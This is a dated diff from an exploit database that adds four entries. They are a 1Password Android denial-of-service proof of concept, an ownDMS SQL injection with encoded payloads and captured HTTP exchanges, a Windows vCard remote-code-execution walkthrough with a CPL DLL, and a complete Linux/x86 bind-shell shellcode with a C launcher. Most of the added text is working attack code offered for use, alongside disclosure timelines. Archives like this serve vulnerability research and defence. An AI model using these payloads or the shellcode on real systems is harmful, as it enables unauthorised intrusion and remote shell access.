DB: 2019-01-16

4 changes to exploits/shellcodes

1Password < 7.0 - Denial of Service

Microsoft Windows VCF - Remote Code Execution

ownDMS 4.7 - SQL Injection

Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)

exploits/android/dos/46165.txt

@@ -0,0 +1,54 @@
+############
+Description
+############
+
+
+The 1Password application < 7.0 for Android is affected by a Denial Of
+Service vulnerability. By starting the activity
+com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity or
+com.agilebits.onepassword.filling.openyolo.OpenYoloRetrieveActivity from an
+external application (since they are exported), it is possible to crash the
+1Password instance.
+
+ 
+
+############
+Poc
+############
+
+ 
+
+To invoke the exported activity and crash the app, it is possible
+to use Drozer:
+
+ 
+
+run app.activity.start --component com.agilebits.onepassword
+com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity
+
+
+
+############
+Affected Components
+############
+
+
+com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity
+com.agilebits.onepassword.filling.openyolo.OpenYoloRetrieveActivity
+
+ 
+
+############
+Disclosure timeline
+############
+
+
+2018-07-27 Contacting 1Password
+
+2018-07-30 1Password acknowledges the vulnerability
+
+2018-08-22 The vulnerability is fixed and made public
+
+
+
+Valerio Brussani (@val_brux)

exploits/php/webapps/46168.txt

@@ -0,0 +1,67 @@
+# Exploit Title: ownDMS 4.7 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-15
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.owndms.com/
+# Software Link: https://datapacket.dl.sourceforge.net/project/owndms/owndms_47.zip
+# Version: 4.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/includes/pdfstream.php?IMG=[SQL]
+# http://localhost/[PATH]/includes/imagestream.php?IMG=[SQL]
+# http://localhost/[PATH]/includes/anyfilestream.php?IMG=[SQL]
+# 
+
+GET /[PATH]/includes/pdfstream.php?IMG=%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35,0x48656c6c6f204861636b657220416269,%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Tue, 15 Jan 2019 11:22:36 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Disposition: attachment; filename="Hello Hacker Abi"
+Content-Length: 859
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/cashbook.php?showfordoc=[SQL]
+# 
+
+GET /[PATH]/cashbook.php?showfordoc=%27%20AND%20%45%58%54%52%41%43%54%56%41%4c%55%45(%32%32,%43%4f%4e%43%41%54(0x5c,%76%65%72%73%69%6f%6e(),(%53%45%4c%45%43%54%20(%45%4c%54(%31%3d%31%2c%31))),%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Tue, 15 Jan 2019 08:15:55 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: private
+Pragma: no-cache
+Content-Length: 5150
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/windows/local/46167.txt

@@ -0,0 +1,160 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt
+[+] ISR: ApparitionSec   
+[+] Zero Day Initiative Program
+
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+A VCF file is a standard file format for storing contact information for a person or business.
+Microsoft Outlook supports the vCard and vCalendar features. These are a powerful new approach to electronic Personal Data Interchange (PDI).
+
+
+
+[Vulnerability Type]
+Insufficient UI Warning Remote Code Execution
+
+
+
+[CVE Reference]
+ZDI-19-013
+ZDI-CAN-6920
+
+
+[Security Issue]
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
+User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
+
+The specific flaw exists within the processing of VCard files. Crafted data in a VCard file can cause Windows to display a dangerous hyperlink.
+The user interface fails to provide any indication of the hazard.
+
+An attacker can leverage this vulnerability to execute code in the context of the current user.
+
+
+[Exploit/POC]
+1) create a directory and name it "http" this will house the .CPL executable file.
+
+
+2) create a .CPL file and give it a website name, I named mine "www.hyp3rlinx.altervista.cpl" 
+or whatever website you wish so it can be referenced in the VCF file.
+
+#include <windows.h>
+
+/* hyp3rlinx */
+
+/*
+gcc -c -m32 hyp3rlinx.altervista.c
+gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o
+*/
+
+void ms_vcf_0day(){
+	 MessageBox( 0, "Continue with install?" , "TrickyDealC0der " , MB_YESNO + MB_ICONQUESTION );
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
+	switch(fdwReason){
+		case DLL_PROCESS_ATTACH:{
+			 ms_vcf_0day();
+			break;
+		}
+		case DLL_PROCESS_DETACH:{
+			 ms_vcf_0day();
+			break;
+		}
+		case DLL_THREAD_ATTACH:{
+			 ms_vcf_0day();
+			break;
+		}
+		case DLL_THREAD_DETACH:{
+			 ms_vcf_0day();
+			break;
+		}
+	}
+	
+  return TRUE;
+}
+
+
+
+3) make sure to rename the executable .DLL extension to a .CPL extension if you did not follow compile instructions above to output as ".CPL".
+e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl
+
+
+
+4) Create .VCF mail file I named mine "trickyDealC0der.vcf"
+
+For the URL in the .VCF Mail file specify a URL like...
+URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
+
+The Windows .VCF File content:
+
+"trickyDealC0der.vcf"
+
+BEGIN:VCARD
+VERSION:4.0
+N:Tricky;DealC0der;;;
+FN:TrickyDealC0der
+EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
+TEL;TYPE="cell,home";PREF=1:tel:+000-000-0000
+ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
+URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
+END:VCARD
+
+
+
+Now, open the "trickyDealC0der.vcf" file and click the website link, the VCF file will traverse back one to the "http" directory where
+our CPL executable file lives and KABOOM! 
+
+
+
+[References]
+https://www.zerodayinitiative.com/advisories/ZDI-19-013/
+
+
+
+[Network Access]
+Remote
+
+
+
+[POC Video URL]
+https://vimeo.com/310684003
+
+
+
+[Disclosure Timeline]
+Notification: Trend Micro Zero Day Initiative Program
+2018-07-23 - Vulnerability reported to vendor
+2019-01-10 - Coordinated public release of advisory
+2019-01-10 - Advisory Updated
+
+ADDITIONAL DETAILS	
+08/06/18 - ZDI reported the vulnerability to the vendor
+08/07/18 - The vendor acknowledged the report and provided a tracking #
+10/01/18 – The vendor requested an additional file
+10/03/18 – ZDI provided added files and a new PoC
+10/03/18 – The vendor advised the report did not meet the bar for service
+10/05/18 – ZDI advised that we believe the report is exploitable and notified the vendor of the intent to 0-day on 10/16/18
+10/08/18 – The vendor advised ZDI they had re-considered a fix and requested an extension to 01/08/19
+10/09/18 – ZDI agreed to the short extension
+11/14/18 – The vendor again advised ZDI of the target patch date 01/08/19
+12/12/18 – The vendor provided ZDI a CVE
+12/19/18 - The vendor wrote to ZDI to advise that “engineering team had decided to pursue the fix as v.Next” and “Microsoft has decided that it will not be fixing this vulnerability and we are closing this case”
+12/27/18 – ZDI notified the vendor of the intent to 0-day on 01/07/18
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

files_exploits.csv

@@ -6249,6 +6249,7 @@ id,file,description,date,author,type,platform,port
 46128,exploits/windows/dos/46128.py,"Liquid Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
 46129,exploits/windows/dos/46129.py,"Blob Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
 46130,exploits/windows/dos/46130.py,"Luminance Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
+46165,exploits/android/dos/46165.txt,"1Password < 7.0 - Denial of Service",2019-01-15,"Valerio Brussani",dos,android,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10213,6 +10214,7 @@ id,file,description,date,author,type,platform,port
 46160,exploits/windows/local/46160.txt,"Microsoft Windows 10 - DSSVC MoveFileInheritSecurity Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
 46161,exploits/windows/local/46161.txt,"Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
 46162,exploits/windows/local/46162.txt,"Microsoft Windows 10 - COM Desktop Broker Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
+46167,exploits/windows/local/46167.txt,"Microsoft Windows VCF - Remote Code Execution",2019-01-15,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40644,3 +40646,4 @@ id,file,description,date,author,type,platform,port
 46154,exploits/php/webapps/46154.txt,"Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80
 46163,exploits/windows/webapps/46163.txt,"Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection",2019-01-14,"SySS GmbH",webapps,windows,
 46164,exploits/cgi/webapps/46164.txt,"AudioCode 400HD - Command Injection",2019-01-14,Sysdream,webapps,cgi,
+46168,exploits/php/webapps/46168.txt,"ownDMS 4.7 - SQL Injection",2019-01-15,"Ihsan Sencan",webapps,php,80

files_shellcodes.csv

@@ -930,3 +930,4 @@ id,file,description,date,author,type,platform
 46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux
 46103,shellcodes/linux_x86/46103.c,"Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86
 46123,shellcodes/generator/46123.py,"Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator
+46166,shellcodes/linux_x86/46166.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2019-01-15,"Joao Batista",shellcode,linux_x86

shellcodes/linux_x86/46166.c

@@ -0,0 +1,94 @@
+/*
+; Title		: Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)
+; Date		: Jan, 2019
+; Author	: Joao Batista
+; Website	: overflw.wordpress.com
+; Twitter	: @x42x42x42x42
+; SLAE-ID	: 1420
+; Tested on	: i686 GNU/Linux
+
+global _start
+
+section .text
+_start:
+  xor eax,eax
+  xor ebx,ebx
+
+  ; socket
+  push ebx
+  inc ebx
+  push ebx	
+  push 0x2
+  mov ecx,esp
+  mov al,0x66
+  int 0x80
+
+  ; bind
+  xchg edi,eax	
+  xor eax,eax
+  inc ebx	
+  push eax
+  push word 0x5c11	; port=4444
+  push bx
+  mov ecx, esp
+  push 0x10
+  push ecx
+  push edi
+  mov ecx,esp
+  mov al,0x66
+  int 0x80
+        
+  ; listen	
+  push eax
+  push edi
+  mov ecx,esp
+  mov al,0x66
+  add ebx,2
+  int 0x80
+	
+  ;accept
+  push eax
+  push eax
+  push edi
+  mov ecx,esp
+  add al,0x66
+  inc ebx
+  int 0x80
+
+  ;dup2
+  xchg ebx,eax
+  xor eax,eax
+  xor ecx,ecx
+  mov cl,0x2
+	
+  loop:
+  mov al,0x3f
+  int 0x80
+  dec ecx
+  jns loop
+	
+  ;execve(/bin/sh)
+  push eax		
+  push word 0x6873	; hs
+  push 0x61622f2f 	; ab//  
+  push 0x6e69622f 	; nib/ 
+  mov ebx,esp
+  push eax
+  mov edx,esp
+  push ebx
+  mov ecx,esp
+  mov al,0xb
+  int 0x80
+*/
+#include<stdio.h>
+#include<string.h>
+
+unsigned char shellcode[] = \
+"\x31\xc0\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x97\x31\xc0\x43\x50\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb0\x66\xcd\x80\x50\x57\x89\xe1\xb0\x66\x83\xc3\x02\xcd\x80\x50\x50\x57\x89\xe1\x04\x66\x43\xcd\x80\x93\x31\xc0\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x66\x68\x73\x68\x68\x2f\x2f\x62\x61\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+main()
+{
+	printf("shellcode length:  %d\n", strlen(shellcode));
+	int (*ret)() = (int(*)())shellcode;
+	ret();
+}